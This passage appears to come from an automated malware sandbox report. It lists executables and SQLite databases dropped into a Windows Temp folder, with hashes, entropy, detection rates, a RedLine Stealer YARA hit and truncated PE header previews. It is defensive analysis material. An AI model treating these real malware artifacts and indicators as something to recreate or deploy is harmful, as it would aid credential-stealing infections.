                                                                                                                                                        SHA-512:B798AF716AEE08369D38E8A449F330BC2875EFA0AEA24E083768B144EEA1C4881894435F1C20A8980CB0916AAAFF78C64DF99DEB52BE5E0E784B9107FD2549F8
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 40%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@...@...@.../.L.Q.../.x.*...I.A.C...@......./.y.v.../.H.A.../.O.A...Rich@...........PE..L...n.._..................... ......p<............@..........................@..................................................(........b......................$!..p...................................@............................................text............................... ..`.data...ho..........................@....sikuz.......p.......~..............@....begene.............................@....rsrc....b.......d..................@..@.reloc...;.......<..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\6BE6.exe
                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):844800
                                                                                                                                                        Entropy (8bit):7.512590176050023
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:/Xj+AMBIt1mgZYgpeS04FTqSEjOZvT2T:KVBItxZreR8Z2T
                                                                                                                                                        MD5:DBFAEC97A910463B8767B8CEB053CF3C
                                                                                                                                                        SHA1:B9470684EB254871A989D41DA389AAB0159A0DED
                                                                                                                                                        SHA-256:F6CB90F76C5BA8A4482C8405F744103F898B7D1920C569B74FB22DD9BEA7D2A4
                                                                                                                                                        SHA-512:12556CB478ACB96394E06CE462DB008669E62FFA2197A91B7C1C3DF46BD5833177C91C30DF3506285A62E08AC184AB1663004429E19F5CE85DF7C88C88810161
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 44%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@...@...@.../.L.Q.../.x.*...I.A.C...@......./.y.v.../.H.A.../.O.A...Rich@...........PE..L....._.....................&......0.............@..........................PH.............................................L...(....@...b....................H.(!..`...................................@............................................text............................... ..`.data...ho..........................@....huwu........ ......................@....sax.........0.......0..............@....rsrc.....3..@...d...>..............@..@.reloc...@....H..B..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7D3D.exe
                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                        File Type:MS-DOS executable
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2207616
                                                                                                                                                        Entropy (8bit):7.974704864370131
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:3C4rV+yASntPTt3o37ySGjHACR/SX08HZ11AGq2dpJ4Wu:yMAmPp4LqB98W92dbG
                                                                                                                                                        MD5:765885E4A5BF2B58911C445E2BA0F7DF
                                                                                                                                                        SHA1:65EDC531C1313DF4ADBFF520B31A998BECBD6760
                                                                                                                                                        SHA-256:654574C360FCB5A7EB4F693D99D5F0C4E32F96B219A7327D41B39D7D5ACDE953
                                                                                                                                                        SHA-512:8AC155DA0B4C4999EB00905DCB3F6E8626438AEB80C000F174030DD9CE2922D922A40DC7E6066F99F371991710E9D911ADBFA20013669767CD793B780BCC0616
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 28%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L...K..a.................,............K......@....@..........................`M...... "...@..................................pI.T.....I..T...........................................................................................................shared..`I............................`.pdata.......pI.....................@....rsrc....T....I..T..................@..@DATA..........K.G}...\..............@.....................................................................................................................................................................................................................................................................................................................)c.....zEG.z.d{.'.v..6.@'TY=.
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\8992.exe
                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):538112
                                                                                                                                                        Entropy (8bit):5.839260930606036
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:i/vGO+99qmdgiwFEMQNJxmYEgqaccLGG5iMHjc/eam:iW1G5IWyfHj2e
                                                                                                                                                        MD5:CF844515328AE2E2F1B4E9879401C7CA
                                                                                                                                                        SHA1:C2328D6EC4DD72F8D298DB5AB4145E7FB2D43575
                                                                                                                                                        SHA-256:3FE128FA6B1779C21D6283F566940788DDE7345E4E91063F5B60D0DCD38C3DA6
                                                                                                                                                        SHA-512:73684CCD9712A7632CDEFAAE000D666B9214701455B4B0211DF2CF07481E0A10BFDA6D45429B39D2BA42BDC79D4F88DFAF9D22CCBDED3BC6C9D9E59B37C20264
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].%...............0..............M... ...`....@.. ....................................@..................................L..K....`............................................................................... ............... ..H............text...$-... ...................... ..`.rsrc........`.......0..............@....reloc...............4..............@..B.................M......H............B...........Z...............................................(....*..0..,.......(d...8.....~....u....s....z&8.........8....*....................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*..(....8....(.........8....*(^...8...........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....C.A.........C.A.......................*.......*.......*.......
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\9904.exe
                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):783360
                                                                                                                                                        Entropy (8bit):7.455092976088704
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:XUHdXthnLe3CumD5nOmDupAhIX7CKWjiAP+S+SgOrTYEgPZME+P+vURhyErBcll/:XadXth8CJFnOukA87ZWji/1cXcPY+Gj8
                                                                                                                                                        MD5:79E048656EB39AB34E3F83FE6535B0A4
                                                                                                                                                        SHA1:11F8EDF6429BF804BA4C65D11FD525B2FE461427
                                                                                                                                                        SHA-256:1C3F0A4EF83A504342EDABA07B99F767076CC0263F7A658296E8ED3628126D50
                                                                                                                                                        SHA-512:A7F538D716A8526E022214A76CBD724078B425C7C07E1230FFF9A7D69DA39BFB76FC0E22A8244ADC2CDA732080CBDEA862D69D1D4FC44A93EFC17D35AE18D9BA
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 40%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@...@...@.../.L.Q.../.x.*...I.A.C...@......./.y.v.../.H.A.../.O.A...Rich@...........PE..L......`.....................&......p.............@.............................................................................(....P..Hb.......................!..p...................................@............................................text...(........................... ..`.data...ho..........................@....repimu......0.......>..............@....foheha......@.......@..............@....rsrc...Hb...P...d...N..............@..@.reloc...@.......B..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\A3D.exe
                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):537600
                                                                                                                                                        Entropy (8bit):5.844228336269724
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:b3ByxvLoUurnIRnqhHtIS3O3tC5Xi/d5rpyd+g87n3eJg:bRyxUTIRgIV5
                                                                                                                                                        MD5:CCBCF301B4A4C51FC6AC6108E1A0A702
                                                                                                                                                        SHA1:C2FA44AE73649EF3FE9B3E11AC6DEEF05D967D6A
                                                                                                                                                        SHA-256:C956EAF697229C8388BCAD6757441F826AD947F619EB684DC62F769F87CB8D3C
                                                                                                                                                        SHA-512:F30A6606858401734C50F152D0C766F38DE7AA226DB99613BCDE989CD47F015EF7916B168945984D95C81FAB45D975C384194FD44FA28A44B60400F6817042DA
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 60%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....x................0..,...........K... ...`....@.. ....................................@.................................@K..K....`............................................................................... ............... ..H............text....+... ...,.................. ..`.rsrc........`......................@....reloc...............2..............@..B................pK......H............<...........W..5............................................(....*..0..,.......(c...8....*.~....u....s....z&8.........8........................*.......*....(c...(....*...j*.......*.......*.......*.......*....(....*.~(....(]...8....(.........8....*....*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....t.A.........t.A.......................*.......*.......*.......*.......
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\A847.exe
                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):570368
                                                                                                                                                        Entropy (8bit):5.274016012365349
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:2ojDvDXTH5H0vASZAdzpuB5lQtoRNyHXIQenAKo7MMye9zurKCy5bl0EBUUffNtb:HDvDXTH5H0vApe35fAb7nC0WEG05iT
                                                                                                                                                        MD5:8B504EEEE773CF6DF3E020A739C72152
                                                                                                                                                        SHA1:39EEE128AB0C3E208E99DE38037ECB042C04B731
                                                                                                                                                        SHA-256:85AD5FC39D15BE4DD1CF278051C255A5C5265EE45BF6EF964438CEF8B0B3BC72
                                                                                                                                                        SHA-512:AC239F7F03616ECDC193A3490C75993D4D7966E780C6C3712D81E4A232D946371876B0BB6AA5FE8D2080D4708048E0EDF3D1E8DC887DFDAF2A4CBC9BB949E327
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;d...............0.................. ........@.. ....................................@.....................................W.... ..............................8................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................H..........d............................................................0.._.......(....(........% ....TF........ ....Z........ ....Z.... ............. ............. ............. .........%...................................... ....;................F........ ....X........ ....?........ ....=.... ........?d... ........=....8{... ........?.... ........=....8....8.... ........?.... ........=....8....8|...8w... ........?>... ........=....8.... ........?.... ........=....80...80
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\AIWBA1DB
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\E936.exe
                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):40960
                                                                                                                                                        Entropy (8bit):0.792852251086831
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\B24B.exe
                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3624448
                                                                                                                                                        Entropy (8bit):7.9987056079848164
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:98304:4RptfnJsrnI6AqXP9kZ7vrcMTbdYroaZV55uQ:Ip7srnRtXK1vrcMvdYrvZVXV
                                                                                                                                                        MD5:E5BD8A53623522C49CCC35BC492B5A11
                                                                                                                                                        SHA1:E36258FC96F90432C79BE82520EF0B27FDBE9C89
                                                                                                                                                        SHA-256:7CE91A1E9B7DF0D018835EE8483C9E97C9718F9865B53728F958F01C740035AF
                                                                                                                                                        SHA-512:93367FC15F8F24D6EF73A62C37E5CA99AA284C609617FF24EF6EBAC7D4B2AC922D9B1AFF986A7B70D9304D2D637213C14B0F218D67DB79E563ADFB5A130CA358
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..a................. ...........@.......@....@...........................U.....a]7.....................................|<Q. .....O......................<Q.............................................................................................#...........................@...........|....0......................@................@...x..................@............ ...0.......|..............@............X...P......................@.............3.......0.................@............ ...`O......T1.............@....rsrc.........O..:...b1.............@....f7uSTEx.....0Q.......2.............@....adata........U......L7.............@...................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\BC9C.exe
                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):115712
                                                                                                                                                        Entropy (8bit):5.892677990184514
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:9UVr85RhYuBGHDp8j468w4d8WD7u7HXhbYpfwxBRFovsSw00IniD:9UVwfUHD2868tiW0JX5BFsiD
                                                                                                                                                        MD5:1A8620AF98D68F9CADB5916341AD1E71
                                                                                                                                                        SHA1:1A39E1F41E89D552BD1228F7DD79E553A8DBB22E
                                                                                                                                                        SHA-256:F593CD3E0A4AD34D16B48B9CDD344E486B42FBFC5BCA0C25ABB75B6CC03AC2D0
                                                                                                                                                        SHA-512:0824ADE76ADC9C5F6120775CE89D6E3B64D5814683DFFA39ADEAB2A90131A7CF1D3BE0A72546C0AFEEB2FD72A510639A64FC37EF23DEA8BAEB9DBBC9C3B38DE6
                                                                                                                                                        Malicious:true
                                                                                                                                                        Yara Hits:
                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\BC9C.exe, Author: Joe Security
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...gn................0......0........... ........@.. ....................... ............@.................................h...O.......$+..........................L................................................ ............... ..H............text........ ...................... ..`.rsrc...$+.......,..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\E936.exe
                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):342528
                                                                                                                                                        Entropy (8bit):6.237184840489677
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:XEiNV8ew8pT/JoMWH3KYFsZGpGnjHa3HpRdRgY27:XECx//JoNH3KgsZQGnjWJRdu
                                                                                                                                                        MD5:BABD835D0FE9E63300B037A5AAAA4284
                                                                                                                                                        SHA1:B23D69DA082314A88E5F0EF188F92B60557D056A
                                                                                                                                                        SHA-256:82AC68B07479792AAF1F4AA1BD78154257349BA4057F29752BE2CE05CE3CC1B2
                                                                                                                                                        SHA-512:F9F1F59C656EFEFE7FC3EA4BBC8DCF6D18E7C4AC94EF4749325117F0A1A517FD7D4FCEACC6DB285AE7248B438C805437B5A5A77C240B8E78C83B2BB27FCBB9D7
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@...@...@.../.L.Q.../.x.*...I.A.C...@......./.y.v.../.H.A.../.O.A...Rich@...........PE..L.....`..................... ......PJ............@..........................P.......+......................................l...(........b.......................!..p...................................@............................................text............................... ..`.data...ho..........................@....fig................................@....hilo...............................@....rsrc....b.......d..................@..@.reloc...;.......<..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\EKNYUKXB
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\E936.exe
                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):73728
                                                                                                                                                        Entropy (8bit):1.1874185457069584
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\F3F5.exe
                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):285696
                                                                                                                                                        Entropy (8bit):5.211669106784899
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:5jLVszqJLXuvAeTzIJK7UEfkV+RH6xNh5BlVggjcGkNIVqIRfed:xLoqJjUxzIJ5cHK5BX7ITsqR
                                                                                                                                                        MD5:F59114142455D258FBFB4E2CF807A8F0
                                                                                                                                                        SHA1:68C4BFC312239E824F0CF87A18EB413A4FDFA9EA
                                                                                                                                                        SHA-256:AE89CB956DFA0344B10CD381525CD3C26B1420E6E422D4CE564ACEA3E838A41C
                                                                                                                                                        SHA-512:E33F7C88676B69FFE50CA31E7DB8DB59833EF1EC66B26E51A92112952BCFA8DAEA99881385DFA2250867D15C34461EB6AF92BFBD04CAB9F2A08CB7942BFDC323
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$%,.EK..EK..EK......EK......EK......EK..0..EK..EJ..EK......EK......EK......EK.Rich.EK.........................PE..L.....*_......................B...................@..........................`C.....jF.......................................W..<....pB.............................................................pS..@...............H............................text...p........................... ..`.rdata..............................@..@.data...`.>..`.......T..............@....zupi...r....`B......j..............@..@.rsrc........pB......n..............@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\WB1V3OP8
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\E936.exe
                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):20480
                                                                                                                                                        Entropy (8bit):0.6970840431455908
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                                        MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                                        SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                                        SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                                        SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\WLN79ZCT
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\E936.exe
                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):118784
                                                                                                                                                        Entropy (8bit):0.4589421877427324
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:T9YBfHNPM5ETQTbKPHBsRkOLkRf+z4QHItYysX0uhnHu132RUioVeINUravDLjY/:2WU+bDoYysX0uhnydVjN9DLjGQLBE3u
                                                                                                                                                        MD5:16B54B80578A453C3615068532495897
                                                                                                                                                        SHA1:03D021364027CDE0E7AE5008940FEB7E07CA293C
                                                                                                                                                        SHA-256:75A16F4B0214A2599ECFBB1F66CAE146B257D11106494858969B19CABCB9B541
                                                                                                                                                        SHA-512:C11979FE1C82B31FDD6457C8C2D157FB4C9DF4FE55457D54104B59F3F880898D82A947049DEB948CA48A5A64A75CFBFC38FDB2E108026EBE7CA9EBE8B1793797
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\almerphs.exe
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\F3F5.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):11435520
                                                                                                                                                        Entropy (8bit):6.522668709904603
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:I0HLeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeen:I
                                                                                                                                                        MD5:C191056C5BF34B8FED02D66198EAD384
                                                                                                                                                        SHA1:C7AC1F255F486B4C26ABB329041A83F6BC918A6F
                                                                                                                                                        SHA-256:B3400209D4B0F773B9DA90FDABAAE320AF863B128AB774ABEBC3A0AD74179D07
                                                                                                                                                        SHA-512:0A7378A2F02922CECE04675B6D4ECD9B7BADA6A4EE651744FA58D3B95822813FECCB2E589CF707266EEEEF2CBD4029DA16B0F191EBA6DEACE2E8F32DD463AB69
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$%,.EK..EK..EK......EK......EK......EK..0..EK..EJ..EK......EK......EK......EK.Rich.EK.........................PE..L.....*_......................B...................@..........................`C.....jF.......................................W..<....pB.............................................................pS..@...............H............................text...p........................... ..`.rdata..............................@..@.data...`.>..`.......T..............@....zupi...r....`B......j..............@..@.rsrc........pB......n..............@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001 (copy)
                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):65536
                                                                                                                                                        Entropy (8bit):0.11014963840036093
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:26YqjXm/Ey6q9995g/jNq3qQ10nMCldimE8eawHjc+9f:26Yvl68TLyMCldzE9BHjc+l
                                                                                                                                                        MD5:D5C813761EA87A8376B0B8400F147D95
                                                                                                                                                        SHA1:E8635A344F9D3068547A2883168EF07239EA15C4
                                                                                                                                                        SHA-256:0DCDDC25B373338B966DB7046BC5BD42905D4938F26EC020A59C84246B5E60BE
                                                                                                                                                        SHA-512:F8B19AB6CA19508F528A3750400D12B92F4C6B5C130E6A38C2D762862A9959FCE181DD2FE6B7932CE0240F84338B924FFB16E811C631E1F585A40A97313149F3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: ................................................................................p........I.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................%....... ......0o(............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.p........Y......................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)
                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):65536
                                                                                                                                                        Entropy (8bit):0.11266050247556877
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:ZjXm/Ey6q9995f1miM3qQ10nMCldimE8eawHza1miIgVP:0l68d1tMLyMCldzE9BHza1tI2
                                                                                                                                                        MD5:3465803C44E00451874070F8A0638BF0
                                                                                                                                                        SHA1:92E936D39D7F323EB92E1D51967AED06B7093D26
                                                                                                                                                        SHA-256:6DE6B43018C796769CF7263B5F68FDD17BF7377FC5CF4F5E16043CEBFE71304A
                                                                                                                                                        SHA-512:740B00B604DB5F10888C102E613BA824A52F66E3C8F94686DFB28DDACE8AD2EDE840FB5BE8832A04E0A1C778A4531E82D45E8EB3A38BDFCC19F977176F59A3A1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: ................................................................................p................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................%....... .......h(............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.p.......O.......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.. (copy)
                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):65536
                                                                                                                                                        Entropy (8bit):0.11264287290436234
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:I0jXm/Ey6q9995kv1mK2P3qQ10nMCldimE8eawHza1mKGP:yl68iv1iPLyMCldzE9BHza1C
                                                                                                                                                        MD5:B461550380404BB6BDAB94BF658A25E6
                                                                                                                                                        SHA1:1371D1F19176AF8BBF12B636BF3DBE1E045E8735
                                                                                                                                                        SHA-256:C56E67D77516CAF86FF213C375628788FAC4A30CD7E1C78E4B0661514B588116
                                                                                                                                                        SHA-512:E15F3C70861FC5F3E487CB2DA4FFC21F9FB1D8D632C2F40C4F05B2470EA2BD4F3A24A6F211FB85A9823B0C796C985ADBDFFAF8334FDD2B91A2A81B404C5D7BA6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
